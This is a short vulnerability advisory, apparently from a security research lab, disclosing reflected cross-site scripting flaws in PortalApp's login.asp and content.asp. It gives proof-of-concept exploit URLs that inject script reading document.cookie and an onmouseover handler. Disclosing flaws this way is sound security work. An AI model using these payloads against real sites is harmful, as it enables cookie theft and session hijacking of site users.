Cross-site Scripting (XSS) Vulnerabilities in PortalApp

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PortalApp which could be exploited to perform cross-site scripting attacks.

1. Cross-site scripting (XSS) vulnerability in PortalApp
   1.1 The vulnerability exists due to input sanitation error in multiple parameters in login.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in users browser in context of the vulnerable website. Exploitation examples: http://host/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie %29%3C/script%3E&passwor d=&ret_page= http://host/login.asp?user_name=&password=%27%22%3E%3Cscript%3 Ealert%28document.cook ie%29%3C/script%3E&ret_page= http://host/login.asp?user_name=&password=&ret _page=%27%22%3E%3Cscri pt%3Ealert%28document.cookie%29%3C/script%3E http://host/login.asp?email=sd %40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&s earch_btn=SEND&action=lookup&do_search=1 1.2 The vulnerability exists due to input sanitation error in the "keywords" parameter in content.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in users browser in context of the vulnerable website.
   Exploitation example:
   http://host/content.asp?CatId=&ContentType=&keywords=sd’"+style=position :absolute;left:0;top:0;w idth:100%25;height:100%25;+onmouseover=alert%28123%29+x&search=%3E&do_search =1
   This vulnerability was independently discovered by r3dm0v3 and it was assigned a CVE number CVE-2008-4612.